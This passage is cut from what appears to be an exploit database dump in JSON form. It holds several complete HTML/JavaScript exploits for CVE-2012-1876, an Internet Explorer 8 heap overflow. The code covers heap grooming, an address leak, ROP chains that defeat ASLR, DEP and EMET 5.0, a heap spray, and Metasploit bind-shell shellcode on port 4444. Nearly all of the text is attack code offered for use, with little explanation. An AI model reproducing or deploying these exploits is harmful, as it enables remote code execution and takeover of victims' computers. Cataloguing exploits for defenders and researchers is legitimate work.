rop = cbuttonlayout + 454843; // MOV 
EAX,DWORD PTR DS:[EAX]\n var rop = rop.toString(16);\n var rop19 = rop.substring(4,8);\n var rop20 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 234657; // PUSHAD\n var rop = rop.toString(16);\n var rop21 = rop.substring(4,8);\n var rop22 = rop.substring(0,4); // } RET\n\n\n var rop = cbuttonlayout + 408958; // PUSH ESP\n var rop = rop.toString(16);\n var rop23 = rop.substring(4,8);\n var rop24 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2228408; // POP ECX\n var rop = rop.toString(16);\n var rop25 = rop.substring(4,8);\n var rop26 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1586172; // POP EAX\n var rop = rop.toString(16);\n var rop27 = rop.substring(4,8);\n var rop28 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\n var rop = rop.toString(16);\n var rop29 = rop.substring(4,8);\n var rop30 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1884912; // PUSH EAX\n var rop = rop.toString(16);\n var rop31 = rop.substring(4,8);\n var rop32 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\n var rop = rop.toString(16);\n var rop33 = rop.substring(4,8);\n var rop34 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\n var rop = rop.toString(16);\n var rop35 = rop.substring(4,8);\n var rop36 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\n var rop = rop.toString(16);\n var rop37 = rop.substring(4,8);\n var rop38 = rop.substring(0,4); // } RET\n\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\n var getmodulew = getmodulew.toString(16);\n var getmodulew1 = getmodulew.substring(4,8);\n var getmodulew2 = getmodulew.substring(0,4); // } RET\n\n var getprocaddr = cbuttonlayout + 4836; // GetProcAddress\n var getprocaddr = getprocaddr.toString(16);\n var getprocaddr1 = getprocaddr.substring(4,8);\n var getprocaddr2 = getprocaddr.substring(0,4); 
// } RET\n\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\n\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\n\n // EMET disable part 0x01\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u101C%u076d\"); // EMET string\n shellcode+= unescape(\"%ue220%u0007\"); // EMET offset\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0000%u0000\"); // Zero out ECX\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // ADD ESP,0C # RETN\n shellcode+= \"EMET\"; // EMET string\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\n // EMET disable part 0x01 end\n\n // Performing a standard Kumeh maneuver ... 
(VirtualProtect mona chain)\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n\n // EMET disable part 0x02\n // Execute the Corbomite bluff to disarm EAF\n shellcode+= unescape(\"%uc0b8%u6d10\");\n shellcode+= unescape(\"%u8b07%u8b00\");\n shellcode+= unescape(\"%u6800%u10c8\");\n shellcode+= unescape(\"%u076d%ud0ff\");\n shellcode+= unescape(\"%ud468%u6d10\");\n shellcode+= unescape(\"%u5007%uc4b8\");\n shellcode+= unescape(\"%u6d10%u8b07\");\n shellcode+= unescape(\"%u8b00%uff00\");\n shellcode+= unescape(\"%u8bd0%u81f0\");\n shellcode+= unescape(\"%uccec%u0002\");\n shellcode+= unescape(\"%uc700%u2404\");\n shellcode+= unescape(\"%u0010%u0001\");\n shellcode+= unescape(\"%ufc8b%uccb9\");\n shellcode+= unescape(\"%u0002%u8300\");\n shellcode+= unescape(\"%u04c7%ue983\");\n shellcode+= unescape(\"%u3304%uf3c0\");\n shellcode+= unescape(\"%u54aa%ufe6a\");\n shellcode+= unescape(\"%ud6ff%u9090\");\n 
shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u29eb\"); // NOPs\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\n shellcode+= unescape(\"%u\"+getprocaddr1+\"%u\"+getprocaddr2); // GetProcAddress\n shellcode+= \"NTDLL\";\n shellcode+= unescape(\"%u0000\");\n shellcode+= unescape(\"%u744e%u6553\"); // NtSetContextThread\n shellcode+= unescape(\"%u4374%u6e6f\");\n shellcode+= unescape(\"%u6574%u7478\");\n shellcode+= unescape(\"%u6854%u6572\");\n shellcode+= unescape(\"%u6461%u0000\");\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // EMET disable part 0x02 end\n\n // Bind shellcode on 4444 :)\n // msf > generate -t js_le\n // windows/shell_bind_tcp - 342 bytes\n // http://www.metasploit.com\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\n // I would keep the shellcode the same size for better reliability :)\n\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\n 
\"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\n \"%u006a%uff53%u41d5\");\n\n // Total spray should be 1000\n var padding = unescape(\"%u9090\");\n while (padding.length < 1000)\n padding = padding + padding;\n var padding = padding.substr(0, 1000 - shellcode.length);\n\n shellcode+= padding;\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n\n var onemeg = shellcode.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n\n var spray = new Array();\n\n for (i=0; i<100; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n}\n\nfunction leak(){\n var leak_col = document.getElementById(\"132\");\n leak_col.width = \"41\";\n leak_col.span = \"19\";\n}\n\nfunction get_leak() {\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\n str_addr = str_addr - 1410704;\n var hex = str_addr.toString(16);\n //alert(hex);\n setTimeout(function(){heapspray(str_addr)}, 50);\n}\n\nfunction trigger_overflow(){\n var evil_col = document.getElementById(\"132\");\n evil_col.width = \"1245880\";\n evil_col.span = \"44\";\n}\n\nsetTimeout(function(){leak()}, 400);\nsetTimeout(function(){get_leak()},450);\nsetTimeout(function(){trigger_overflow()}, 700);\n\n</script>\n</body>\n</html>", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.0 Bypass) (MS12-037)", "edition": 1, "published": "2014-09-29T00:00:00", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.0 Bypass) (MS12-037)", "type": "exploitpack", 
"bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-09-29T00:00:00", "id": "EXPLOITPACK:8D25D01AEAA652118123781053A4BDBA", "href": "", "sourceData": "<!--\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass\n** Exploit Coded by sickness || EMET 5.0 bypass by ryujin\n** http://www.offensive-security.com/vulndev/disarming-emet-v5-0/ \u200e\n** Affected Software: Internet Explorer 8\n** Vulnerability: Fixed Col Span ID\n** CVE: CVE-2012-1876\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0\n-->\n\n<html>\n<body>\n<div id=\"evil\"></div>\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00a0 </col></table>\n<script language='javascript'>\n\nfunction strtoint(str) {\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\n}\n\nvar free = \"EEEE\";\nwhile ( free.length < 500 ) free += free;\n\nvar string1 = \"AAAA\";\nwhile ( string1.length < 500 ) string1 += string1;\n\nvar string2 = \"BBBB\";\nwhile ( string2.length < 500 ) string2 += string2;\n\nvar fr = new Array();\nvar al = new Array();\nvar bl = new Array();\n\nvar div_container = document.getElementById(\"evil\");\ndiv_container.style.cssText = \"display:none\";\n\nfor (var i=0; i < 500; i+=2) {\n fr[i] = free.substring(0, (0x100-6)/2);\n al[i] = string1.substring(0, (0x100-6)/2);\n bl[i] = string2.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n}\n\nfor (var i=200; i<500; i+=2 ) {\n fr[i] = null;\n CollectGarbage();\n}\n\nfunction heapspray(cbuttonlayout) {\n CollectGarbage();\n var rop = cbuttonlayout + 4161; // RET\n var rop = rop.toString(16);\n var rop1 = rop.substring(4,8);\n var rop2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 11360; // POP EBP\n var rop = rop.toString(16);\n var rop3 = rop.substring(4,8);\n var rop4 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\n var rop = rop.toString(16);\n var 
rop5 = rop.substring(4,8);\n var rop6 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12377; // POP EBX\n var rop = rop.toString(16);\n var rop7 = rop.substring(4,8);\n var rop8 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 642768; // POP EDX\n var rop = rop.toString(16);\n var rop9 = rop.substring(4,8);\n var rop10 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\n var rop = rop.toString(16);\n var rop11 = rop.substring(4,8);\n var rop12 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5504544; // Writable location\n var rop = rop.toString(16);\n var writable1 = rop.substring(4,8);\n var writable2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12462; // POP EDI\n var rop = rop.toString(16);\n var rop13 = rop.substring(4,8);\n var rop14 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\n var rop = rop.toString(16);\n var rop15 = rop.substring(4,8);\n var rop16 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 63776; // JMP EAX\n var rop = rop.toString(16);\n var jmpeax1 = rop.substring(4,8);\n var jmpeax2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 85751; // POP EAX\n var rop = rop.toString(16);\n var rop17 = rop.substring(4,8);\n var rop18 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 4936; // VirtualProtect()\n var rop = rop.toString(16);\n var vp1 = rop.substring(4,8);\n var vp2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\n var rop = rop.toString(16);\n var rop19 = rop.substring(4,8);\n var rop20 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 234657; // PUSHAD\n var rop = rop.toString(16);\n var rop21 = rop.substring(4,8);\n var rop22 = rop.substring(0,4); // } RET\n\n\n var rop = cbuttonlayout + 408958; // PUSH ESP\n var rop = rop.toString(16);\n var rop23 = rop.substring(4,8);\n var rop24 = rop.substring(0,4); // } 
RET\n\n var rop = cbuttonlayout + 2228408; // POP ECX\n var rop = rop.toString(16);\n var rop25 = rop.substring(4,8);\n var rop26 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1586172; // POP EAX\n var rop = rop.toString(16);\n var rop27 = rop.substring(4,8);\n var rop28 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\n var rop = rop.toString(16);\n var rop29 = rop.substring(4,8);\n var rop30 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1884912; // PUSH EAX\n var rop = rop.toString(16);\n var rop31 = rop.substring(4,8);\n var rop32 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\n var rop = rop.toString(16);\n var rop33 = rop.substring(4,8);\n var rop34 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\n var rop = rop.toString(16);\n var rop35 = rop.substring(4,8);\n var rop36 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\n var rop = rop.toString(16);\n var rop37 = rop.substring(4,8);\n var rop38 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\n var rop = rop.toString(16);\n var rop39 = rop.substring(4,8);\n var rop40 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI\n var rop = rop.toString(16);\n var rop41 = rop.substring(4,8);\n var rop42 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX\n var rop = rop.toString(16);\n var rop43 = rop.substring(4,8);\n var rop44 = rop.substring(0,4); // } RET\n\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\n var getmodulew = getmodulew.toString(16);\n var getmodulew1 = getmodulew.substring(4,8);\n var getmodulew2 = getmodulew.substring(0,4); // } RET\n\n\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= 
unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\n\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\n\n // EMET disable part 0x01\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u10c4%u076d\"); // EMET_STRING_PTR (GetModuleHandle argument)\n shellcode+= unescape(\"%ua84c%u000a\"); // EMET_CONFIG_STRUCT offset \n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u10c0%u076d\"); // MEM_ADDRESS_PTR (Store EMET base address here for later)\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT)\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u104c%u076d\"); // Get fake DecodePointer argument from the stack and update it with the encoded value\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%u10c0%u076d\"); // Get EMET base address Ptr\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= 
unescape(\"%u80b0%u0004\"); // Get DecodePointer offset from the stack \n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT)\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u9090%u9090\"); // Fake DecodePointer argument (Will be patched)\n shellcode+= unescape(\"%u10bc%u076d\"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later)\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0558%u0000\"); // ROP Protections offset\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0000%u0000\"); // NULL\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\n // EMET disable part 0x01 end\n\n // Performing a standard Kumeh maneuver ... 
(VirtualProtect mona chain)\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\n\n // Store various pointers here\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u14eb\"); // NOPs\n shellcode+= unescape(\"%u4242%u4242\"); // Decoded CONFIG structure pointer\n shellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address on the *stack*\n shellcode+= \"EMET\"; // EMET string\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // Store various pointers here\n\n // EMET disable part 0x02\n // MOV EAX,DWORD PTR DS:[076D10BCH]\n // MOV ESI,DWORD PTR [EAX+518H]\n // SUB ESP,2CCH\n // MOV DWORD PTR [ESP],10010H\n // MOV EDI,ESP\n // MOV ECX,2CCH\n // ADD EDI,4\n // SUB ECX,4\n // XOR EAX,EAX\n // REP STOS BYTE PTR ES:[EDI]\n // PUSH ESP\n // PUSH 0FFFFFFFEH\n // CALL ESI\n shellcode+= 
unescape(\"%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec\" +\n \"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" +\n \"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" +\n \"%ufe6a%ud6ff\");\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // EMET disable part 0x02 end\n\n // Bind shellcode on 4444 :)\n // msf > generate -t js_le\n // windows/shell_bind_tcp - 342 bytes\n // http://www.metasploit.com\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\n // I would keep the shellcode the same size for better reliability :)\n\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\n \"%u006a%uff53%u41d5\");\n\n // Total spray should be 1000\n var padding = unescape(\"%u9090\");\n while 
(padding.length < 1000)\n padding = padding + padding;\n var padding = padding.substr(0, 1000 - shellcode.length);\n\n shellcode+= padding;\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n\n var onemeg = shellcode.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n\n var spray = new Array();\n\n for (i=0; i<100; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n}\n\nfunction leak(){\n var leak_col = document.getElementById(\"132\");\n leak_col.width = \"41\";\n leak_col.span = \"19\";\n}\n\nfunction get_leak() {\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\n str_addr = str_addr - 1410704;\n var hex = str_addr.toString(16);\n //alert(hex);\n setTimeout(function(){heapspray(str_addr)}, 50);\n}\n\nfunction trigger_overflow(){\n var evil_col = document.getElementById(\"132\");\n evil_col.width = \"1245880\";\n evil_col.span = \"44\";\n}\n\nsetTimeout(function(){leak()}, 400);\nsetTimeout(function(){get_leak()},450);\nsetTimeout(function(){trigger_overflow()}, 700);\n\n</script>\n</body>\n</html>", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP Bypass) (MS12-037)", "edition": 1, "published": "2013-01-10T00:00:00", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP Bypass) (MS12-037)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2013-01-10T00:00:00", "id": "EXPLOITPACK:B3A5822873FF7E264F097AB7EE9F4396", "href": "", "sourceData": "<!--\n** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass\n** Author: sickness@offsec.com\n** Thanks to Ryujin, Dookie and mr_me :) for their help.\n\n####################################################################\n\n** Affected 
Software: Internet Explorer 8\n** Vulnerability: Fixed Col Span ID\n** CVE: CVE-2012-1876\n** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb\n** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514\n** Old version of the exploit available at: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24017-old.zip\n\n####################################################################\n\n** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak :)\n** To get it working on a different version of Windows you will require to make your own chances to the exploit :)\n** Have fun :)\n-->\n\n<html>\n<body>\n<div id=\"evil\"></div>\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00a0 </col></table>\n<script language='javascript'>\n\nfunction strtoint(str) {\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\n}\n\nvar free = \"EEEE\";\nwhile ( free.length < 500 ) free += free;\n\nvar string1 = \"AAAA\";\nwhile ( string1.length < 500 ) string1 += string1;\n\nvar string2 = \"BBBB\";\nwhile ( string2.length < 500 